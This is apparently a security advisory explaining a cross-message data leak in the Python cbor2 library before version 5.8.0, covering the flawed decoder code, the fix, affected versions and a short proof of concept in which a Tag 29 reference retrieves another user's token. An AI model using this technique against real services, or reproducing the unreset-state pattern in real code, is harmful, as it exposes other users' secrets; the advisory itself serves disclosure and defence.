If you reuse a `CBORDecoder` instance to process messages from different users, the decoder remembers 'shareable' values (Tag 28) from the first user. A second user can reference those values (Tag 29) to extract secrets, creating a cross-context information leak.
A logic flaw in the popular Python `cbor2` library allows sensitive data from one decoding session to persist and bleed into subsequent sessions due to improper state management of the 'Value Sharing' feature.
Serialization libraries are usually the janitors of the software world: they quietly clean up data formats, move bytes around, and try not to get noticed. But cbor2, a popular Python library for the Concise Binary Object Representation (CBOR) format, decided to get a little too friendly.
At the heart of this issue is a specific feature from the CBOR tag registry: Value Sharing. To avoid encoding the same value twice, and to represent shared or cyclic references, CBOR lets you mark a value as 'shareable' (Tag 28) and then reference it later by an index (Tag 29). It's basically a built-in deduplication mechanism.
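To make the two tags concrete, here is a minimal sketch that hand-encodes a two-element CBOR array: a shareable string followed by a reference to it. The helpers `encode_tag` and `encode_short_text` are hypothetical names written for this illustration; they are not part of cbor2 and only cover the tiny subset of CBOR needed here.

```python
def encode_tag(tag: int, content: bytes) -> bytes:
    """Wrap already-encoded CBOR content in a tag numbered 24..255."""
    if not 24 <= tag <= 255:
        raise ValueError("this sketch only handles one-byte tag numbers")
    # 0xD8 = major type 6 (tag) with the tag number in the next byte
    return bytes([0xD8, tag]) + content


def encode_short_text(text: str) -> bytes:
    """Encode a UTF-8 string shorter than 24 bytes (major type 3)."""
    raw = text.encode("utf-8")
    if len(raw) >= 24:
        raise ValueError("this sketch only handles short strings")
    return bytes([0x60 | len(raw)]) + raw


shareable = encode_tag(28, encode_short_text("hello"))  # Tag 28: mark as shareable
reference = encode_tag(29, b"\x00")                     # Tag 29: refer to index 0
message = bytes([0x82]) + shareable + reference         # 0x82 = array of two items

print(message.hex())  # 82d81c6568656c6c6fd81d00
```

Note that the reference on its own is just three bytes (`d8 1d 00`), which is all a message needs in order to ask a decoder for "whatever is stored at index 0".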
The problem? cbor2 took the concept of 'sharing' a bit too literally. It turns out that if you reuse a decoder object, which many high-performance Python frameworks do to save initialization overhead, the library didn't bother to clear its memory between messages. It's like writing a secret on a whiteboard during a meeting and then inviting the next group in without erasing it.
The vulnerability lies in the `CBORDecoder` class. This class maintains an internal list called `_shareables` to track values marked with Tag 28. In a perfect world, this list would be ephemeral, existing only for the duration of a single `decode()` call.
However, in versions prior to 5.8.0, the cleanup logic was flawed. Specifically, when using helper methods like `decode_from_bytes()`, or if a developer simply reused a long-lived `CBORDecoder` instance, the `_shareables` list was not reset.
This created a State Pollution vulnerability. If User A sends a message containing a sensitive token marked as 'shareable', that token sits in the decoder's RAM. If User B (or an attacker) subsequently sends a message to the same decoder instance using a 'shared reference' (Tag 29), the decoder happily looks up the index in its stale memory and returns User A's token. No authentication, no boundary checks, just pure, unadulterated data leakage.
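The mechanics can be sketched with a toy model. `ToyDecoder` below is a hypothetical stand-in, not cbor2's implementation: messages are plain tuples, where `("share", value)` plays the role of Tag 28 and `("ref", index)` plays the role of Tag 29. The only thing it has in common with the vulnerable decoder is that its list of shareables is never reset.

```python
class ToyDecoder:
    """Toy decoder that never resets its shareables (NOT cbor2 itself)."""

    def __init__(self):
        self._shareables = []

    def decode(self, message):
        kind, value = message
        if kind == "share":   # plays the role of Tag 28
            self._shareables.append(value)
            return value
        if kind == "ref":     # plays the role of Tag 29
            return self._shareables[value]
        raise ValueError(f"unknown message kind: {kind}")


# One decoder instance serving two different users
shared_decoder = ToyDecoder()
shared_decoder.decode(("share", "AdminToken123"))  # User A's message
leaked = shared_decoder.decode(("ref", 0))         # User B's message
print(leaked)  # AdminToken123

# A fresh instance has nothing to leak
fresh_decoder = ToyDecoder()
try:
    fresh_decoder.decode(("ref", 0))
    fresh_leaked = True
except IndexError:
    fresh_leaked = False
print(fresh_leaked)  # False
```

The second message never defines a shareable of its own; the value it receives comes entirely from state left behind by the first.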
Let's look at the vulnerable implementation. The code prioritized swapping the file pointer (where data is read from) but forgot about the internal state (what data has been seen).
Here is a simplified view of the vulnerable flow in `_decoder.py`:
```python
# The Vulnerable Way
def decode_from_bytes(self, buf: bytes) -> object:
    with BytesIO(buf) as fp:
        old_fp = self.fp
        self.fp = fp
        # loops over data, populating self._shareables
        retval = self._decode()
        # OOPS: self._shareables is NOT cleared here
        self.fp = old_fp
        return retval
```

The fix introduced in version 5.8.0 is elegant. It introduces a recursion depth counter. We only want to wipe the memory when the top-level decoding is finished (depth 0), not in the middle of a nested structure.
```python
# The Fixed Way (v5.8.0)
@contextmanager
def _decoding_context(self):
    self._decode_depth += 1
    try:
        yield
    finally:
        self._decode_depth -= 1
        # Only clear memory if we are back at the surface
        if self._decode_depth == 0:
            self._shareables.clear()
            self._share_index = None
```

This ensures that `_shareables` only lives as long as the current message being processed.
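To see why the counter matters, here is a toy model of the same idea. `ToyFixedDecoder` and its tuple-based message format are assumptions made up for this sketch; only the depth-counting context manager mirrors the snippet above. Nested `decode()` calls inside one message still see each other's shareables, but nothing survives once the outermost call returns.

```python
from contextlib import contextmanager


class ToyFixedDecoder:
    """Toy decoder with a depth-counted cleanup (NOT cbor2 itself)."""

    def __init__(self):
        self._shareables = []
        self._decode_depth = 0

    @contextmanager
    def _decoding_context(self):
        self._decode_depth += 1
        try:
            yield
        finally:
            self._decode_depth -= 1
            # Wipe state only when the outermost decode() finishes
            if self._decode_depth == 0:
                self._shareables.clear()

    def decode(self, item):
        with self._decoding_context():
            kind, value = item
            if kind == "share":   # plays the role of Tag 28
                self._shareables.append(value)
                return value
            if kind == "ref":     # plays the role of Tag 29
                return self._shareables[value]
            if kind == "list":    # nested structure: recursive decode
                return [self.decode(child) for child in value]
            raise ValueError(f"unknown item kind: {kind}")


decoder = ToyFixedDecoder()

# Within one message, a reference to an earlier shareable still resolves
result = decoder.decode(("list", [("share", "tok"), ("ref", 0)]))
print(result)  # ['tok', 'tok']

# A later message can no longer reach it
try:
    decoder.decode(("ref", 0))
    cross_message_leak = True
except IndexError:
    cross_message_leak = False
print(cross_message_leak)  # False
```

Clearing on every call instead of only at depth 0 would break the first case, because the inner `decode()` for the shareable would erase it before the reference was resolved.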
Exploiting this is trivially easy if you can find an endpoint that reuses a cbor2 decoder instance. This is common in RPC services or custom protocol handlers that initialize the decoder once globally to avoid the overhead of object creation.
Step 1: The Setup (The Victim)

The victim sends a legitimate payload. The application parses it.

```python
from io import BytesIO

import cbor2

# One long-lived decoder shared across requests (the risky pattern)
decoder = cbor2.CBORDecoder(BytesIO())

# CBOR: Tag 28("AdminToken123")
# The decoder unknowingly caches "AdminToken123" at index 0
admin_payload = cbor2.dumps(cbor2.CBORTag(28, "AdminToken123"))
decoder.decode_from_bytes(admin_payload)
```

Step 2: The Extraction (The Attacker)

The attacker sends a payload that is syntactically valid but references a value they never defined. They simply ask for "Value #0".
```python
# CBOR: Tag 29(0)
# The decoder retrieves index 0 from the PREVIOUS execution
attacker_payload = cbor2.dumps(cbor2.CBORTag(29, 0))
stolen_data = decoder.decode_from_bytes(attacker_payload)
print(f"Stolen: {stolen_data}")
# Output: Stolen: AdminToken123
```

This is a classic "Oracle" attack where the system's own memory state serves as the oracle for the attacker.
A CVSS score of 4.0 (Medium) might make this seem like a nothingburger, but don't be fooled. The severity depends entirely on what is being serialized.
If cbor2 is used in a stateless web worker that dies after every request, this bug is unexploitable. However, if it is used in a long-lived process that reuses one decoder across requests, such as the RPC services and custom protocol handlers described above, then this becomes a critical data leak. You could leak session tokens, PII, or internal routing keys. It allows an attacker to peek into the request history of the server process.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L

| Product | Affected Versions | Fixed Version |
|---|---|---|
| cbor2 (agronholm) | >= 3.0.0, < 5.8.0 | 5.8.0 |
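A quick way to check an environment against the range in the table is sketched below. The helper names `parse_version` and `is_affected` are hypothetical, and the parser is deliberately naive: it reads only the leading numeric components, so pre-release suffixes such as `rc1` are ignored. The installed version is read with the standard library's `importlib.metadata`.

```python
import re
from importlib.metadata import PackageNotFoundError, version


def parse_version(text: str) -> tuple:
    """Read leading numeric components, e.g. '5.7.1' -> (5, 7, 1)."""
    match = re.match(r"\d+(?:\.\d+)*", text)
    if match is None:
        raise ValueError(f"cannot parse version: {text!r}")
    parts = tuple(int(part) for part in match.group().split("."))
    # Pad short versions such as '5.8' to three components
    return parts + (0,) * (3 - len(parts))


def is_affected(text: str) -> bool:
    """True if the version falls in the range >= 3.0.0, < 5.8.0."""
    return (3, 0, 0) <= parse_version(text) < (5, 8, 0)


try:
    installed = version("cbor2")
except PackageNotFoundError:
    print("cbor2 is not installed in this environment")
else:
    status = "affected" if is_affected(installed) else "not affected"
    print(f"cbor2 {installed}: {status}")
```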
| Attribute | Detail |
|---|---|
| CWE | CWE-212 (Improper Removal of Sensitive Information) |
| Attack Vector | Network |
| CVSS v4.0 | 4.0 (Medium) |
| Exploit Status | PoC Available |
| Component | cbor2 Library |
| Patch Date | 2024-02-05 |